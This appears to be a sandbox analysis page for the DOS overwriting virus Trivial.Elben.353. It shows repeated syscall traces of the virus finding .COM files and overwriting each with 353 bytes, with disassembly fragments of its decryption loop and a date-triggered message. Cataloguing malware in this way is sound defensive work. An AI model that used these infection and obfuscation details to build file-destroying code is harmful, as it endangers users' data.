Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Elben.353

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:35.889638717Z 78 PC: 12a9b | Find first file
2018-12-17T22:52:35.896454891Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + si], al
0x12b2f: add byte ptr [bx + si], al
0x12b31: add al, ch
0x12b33: inc bx
0x12b34: add byte ptr [bp + di - 0x13c2], al
0x12b38: add word ptr [bx + si], ax
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-17T22:52:35.900616558Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:52:35.908161371Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:35.91572497Z 62 PC: 12a7a | Close file
2018-12-17T22:52:35.931621792Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:35.940523213Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub word ptr [di], bp
0x12b28: inc dx
0x12b29: dec si
0x12b2a: dec sp
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bp + si + 0x3b], al
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-17T22:52:35.943308855Z 61 PC: 12a67 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:52:35.952353947Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:35.960502343Z 62 PC: 12a7a | Close file
2018-12-17T22:52:35.969411399Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:35.97344758Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub byte ptr [si], ch
0x12b28: inc cx
0x12b29: dec bp
0x12b2a: dec bx
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bp + si + 0x3b], al
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-17T22:52:35.976711963Z 61 PC: 12a67 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:52:35.984260864Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:35.991783805Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.005581073Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:36.009067332Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: daa
0x12b27: sub ax, word ptr [bx + si + 0x4c]
0x12b2a: dec dx
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + 0x3b], al
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
0x12b48: jmp 0x12b35
2018-12-17T22:52:36.012855748Z 61 PC: 12a67 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:52:36.03062084Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.037955378Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.048221943Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:36.05194125Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub bh, byte ptr es:[bx]
0x12b29: dec bx
0x12b2a: dec cx
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + 0x3b], al
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
0x12b48: jmp 0x12b35
2018-12-17T22:52:36.055004024Z 61 PC: 12a67 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:52:36.062788216Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.071243639Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.079910409Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:36.084647087Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: and ax, 0x3e29
0x12b29: dec dx
0x12b2a: dec ax
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [di + 0x3b], cl
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
0x12b48: jmp 0x12b35
2018-12-17T22:52:36.088484206Z 61 PC: 12a67 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:52:36.095639176Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.104848065Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.113466755Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:36.117684798Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: and al, 0x28
0x12b28: cmp ax, 0x4749
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [di + 0x3b], cl
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
0x12b48: jmp 0x12b35
0x12b4a: ret
2018-12-17T22:52:36.120530043Z 61 PC: 12a67 | Open file (Filename = 'PAH.COM')
2018-12-17T22:52:36.127883176Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.136269169Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.145180469Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:36.148544418Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: and sp, word ptr [bx]
0x12b28: cmp al, 0x48
0x12b2a: inc si
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bp + si + 0x3b], dl
0x12b30: add byte ptr [bx + si], al
0x12b32: call 0x12b78
0x12b35: cmp word ptr [0x1ec], 0
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
0x12b48: jmp 0x12b35
2018-12-17T22:52:36.15308098Z 61 PC: 12a67 | Open file (Filename = 'TEST.COM')
2018-12-17T22:52:36.161388596Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-17T22:52:36.164286008Z 62 PC: 12a7a | Close file
2018-12-17T22:52:36.172924666Z 79 PC: 12aa9 | Find next file
2018-12-17T22:52:36.175483292Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8
0x12ab6: jne 0x12ac4
0x12ab8: cmp dl, 0x1f
0x12abb: jne 0x12ac4
0x12abd: mov ah, 9
0x12abf: mov dx, 0x186
0x12ac2: int 0x21
0x12ac4: int 0x20
0x12ac6: or ax, 0x460a
0x12ac9: sub ax, 0x5250
0x12acc: dec di
0x12acd: push sp
0x12ace: and byte ptr [bp + di + 0x55], dl
0x12ad1: pop ax
0x12ad2: pop ax
0x12ad3: pop ax
0x12ad4: pop ax
0x12ad5: and word ptr [di], cx
0x12ad7: or dl, byte ptr [si + 0x42]
0x12ada: inc cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:45.272098495Z 78 PC: 12a9b | Find first file
2018-12-25T12:29:45.278947439Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + si], al
0x12b2f: add byte ptr [bx + si], al
0x12b31: add al, ch
0x12b33: inc bx
0x12b34: add byte ptr [bp + di - 0x13c2], al
0x12b38: add word ptr [bx + si], ax
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-25T12:29:45.281468679Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:45.287575361Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:45.295237652Z 62 PC: 12a7a | Close file
2018-12-25T12:29:45.400840758Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:45.403732599Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.406376904Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.414459294Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.421774884Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.430815323Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.433724415Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.436085992Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.443120722Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.450780872Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.459387354Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.462192381Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.465136591Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.47223667Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.47974421Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.491073287Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.494845397Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.497603086Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.506426405Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.513888347Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.522182766Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.525048537Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.527623356Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.534872463Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.542417498Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.551550243Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.554533083Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.557072429Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.564607488Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.571999234Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.581311542Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.593567708Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.596129942Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.603305571Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.606872676Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.615887222Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.618482627Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8
0x12ab6: jne 0x12ac4
0x12ab8: cmp dl, 0x1f
0x12abb: jne 0x12ac4
0x12abd: mov ah, 9
0x12abf: mov dx, 0x186
0x12ac2: int 0x21
0x12ac4: int 0x20
0x12ac6: or ax, 0x460a
0x12ac9: sub ax, 0x5250
0x12acc: dec di
0x12acd: push sp
0x12ace: and byte ptr [bp + di + 0x55], dl
0x12ad1: pop ax
0x12ad2: pop ax
0x12ad3: pop ax
0x12ad4: pop ax
0x12ad5: and word ptr [di], cx
0x12ad7: or dl, byte ptr [si + 0x42]
0x12ada: inc cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:45.851505741Z 78 PC: 12a9b | Find first file
2018-12-25T12:29:45.858784925Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + si], al
0x12b2f: add byte ptr [bx + si], al
0x12b31: add al, ch
0x12b33: inc bx
0x12b34: add byte ptr [bp + di - 0x13c2], al
0x12b38: add word ptr [bx + si], ax
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-25T12:29:45.875360076Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:45.883116922Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:45.89215081Z 62 PC: 12a7a | Close file
2018-12-25T12:29:45.908821838Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:45.912056406Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.915196408Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.924550754Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.934241146Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.939905372Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.94235345Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.944013708Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.9483818Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.956146685Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:45.974148349Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:45.976919249Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:45.982206493Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:45.989178321Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:45.995891622Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.010731112Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.013774266Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.016329854Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.023625758Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.031536608Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.04075768Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.044432756Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.048579687Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.055861316Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.063349196Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.073333848Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.076328659Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.078862544Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.086843812Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.094125376Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.103748008Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.10804876Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.110969812Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.118550259Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.121941831Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.132231638Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.135397612Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8
0x12ab6: jne 0x12ac4
0x12ab8: cmp dl, 0x1f
0x12abb: jne 0x12ac4
0x12abd: mov ah, 9
0x12abf: mov dx, 0x186
0x12ac2: int 0x21
0x12ac4: int 0x20
0x12ac6: or ax, 0x460a
0x12ac9: sub ax, 0x5250
0x12acc: dec di
0x12acd: push sp
0x12ace: and byte ptr [bp + di + 0x55], dl
0x12ad1: pop ax
0x12ad2: pop ax
0x12ad3: pop ax
0x12ad4: pop ax
0x12ad5: and word ptr [di], cx
0x12ad7: or dl, byte ptr [si + 0x42]
0x12ada: inc cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:45.95759734Z 78 PC: 12a9b | Find first file
2018-12-25T12:29:45.980123195Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + si], al
0x12b2f: add byte ptr [bx + si], al
0x12b31: add al, ch
0x12b33: inc bx
0x12b34: add byte ptr [bp + di - 0x13c2], al
0x12b38: add word ptr [bx + si], ax
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-25T12:29:45.983673526Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:45.992256708Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:46.001160515Z 62 PC: 12a7a | Close file
2018-12-25T12:29:46.020931323Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:46.024392241Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.027737046Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.035831356Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.043636918Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.052441605Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.056391381Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.060168262Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.079360711Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.088642328Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.098044199Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.101374279Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.105735558Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.113503674Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.121433866Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.132111418Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.135891515Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.138984826Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.146738937Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.15571275Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.16475938Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.168515949Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.173050772Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.181301516Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.189165668Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.202595812Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.205862857Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.208877304Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.217619102Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.226615207Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.240601981Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.24358057Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.24637023Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.253796388Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.260574683Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.274471049Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.278082044Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8
0x12ab6: jne 0x12ac4
0x12ab8: cmp dl, 0x1f
0x12abb: jne 0x12ac4
0x12abd: mov ah, 9
0x12abf: mov dx, 0x186
0x12ac2: int 0x21
0x12ac4: int 0x20
0x12ac6: or ax, 0x460a
0x12ac9: sub ax, 0x5250
0x12acc: dec di
0x12acd: push sp
0x12ace: and byte ptr [bp + di + 0x55], dl
0x12ad1: pop ax
0x12ad2: pop ax
0x12ad3: pop ax
0x12ad4: pop ax
0x12ad5: and word ptr [di], cx
0x12ad7: or dl, byte ptr [si + 0x42]
0x12ada: inc cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10940,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:46.196328084Z 78 PC: 12a9b | Find first file
2018-12-25T12:29:46.204225267Z 44 PC: 12b1c | Get time 0x12b1c: cmp dx, 0
0x12b1f: je 0x12b18
0x12b21: mov word ptr [0x1ee], dx
0x12b25: ret
0x12b26: sub ch, byte ptr [0x4f43]
0x12b2a: dec bp
0x12b2b: add byte ptr [bx + si], al
0x12b2d: add byte ptr [bx + si], al
0x12b2f: add byte ptr [bx + si], al
0x12b31: add al, ch
0x12b33: inc bx
0x12b34: add byte ptr [bp + di - 0x13c2], al
0x12b38: add word ptr [bx + si], ax
0x12b3a: je 0x12b4a
0x12b3c: lodsw ax, word ptr [si]
0x12b3d: ror ax, cl
0x12b3f: xor ax, cx
0x12b41: add ax, cx
0x12b43: stosw word ptr es:[di], ax
0x12b44: dec word ptr [0x1ec]
2018-12-25T12:29:46.207210467Z 61 PC: 12a67 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:46.215585857Z 64 PC: 12a76 | Write file or device (Write 353 bytes on handle 5)
2018-12-25T12:29:46.22343443Z 62 PC: 12a7a | Close file
2018-12-25T12:29:46.241414969Z 79 PC: 12aa9 | Find next file
2018-12-25T12:29:46.245671444Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.248711456Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.258561386Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.266226816Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.275176057Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.279028112Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.28330299Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.290665677Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.298808061Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.30966388Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.312778164Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.31551131Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.324457089Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.332314167Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.341874379Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.346388803Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.348954868Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.356142614Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.370051738Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.379272066Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.382577672Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.386479519Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.394013166Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.40173091Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.411635537Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.41601349Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.419062256Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.426917288Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.43486046Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.44932553Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.452338164Z 44 PC: 12b1c | Get time (See above)
2018-12-25T12:29:46.456503436Z 61 PC: 12a67 | Open file (See above)
2018-12-25T12:29:46.46420738Z 64 PC: 12a76 | Write file or device (See above)
2018-12-25T12:29:46.476263395Z 62 PC: 12a7a | Close file (See above)
2018-12-25T12:29:46.487132246Z 79 PC: 12aa9 | Find next file (See above)
2018-12-25T12:29:46.48987701Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dh, 8
0x12ab6: jne 0x12ac4
0x12ab8: cmp dl, 0x1f
0x12abb: jne 0x12ac4
0x12abd: mov ah, 9
0x12abf: mov dx, 0x186
0x12ac2: int 0x21
0x12ac4: int 0x20
0x12ac6: or ax, 0x460a
0x12ac9: sub ax, 0x5250
0x12acc: dec di
0x12acd: push sp
0x12ace: and byte ptr [bp + di + 0x55], dl
0x12ad1: pop ax
0x12ad2: pop ax
0x12ad3: pop ax
0x12ad4: pop ax
0x12ad5: and word ptr [di], cx
0x12ad7: or dl, byte ptr [si + 0x42]
0x12ada: inc cx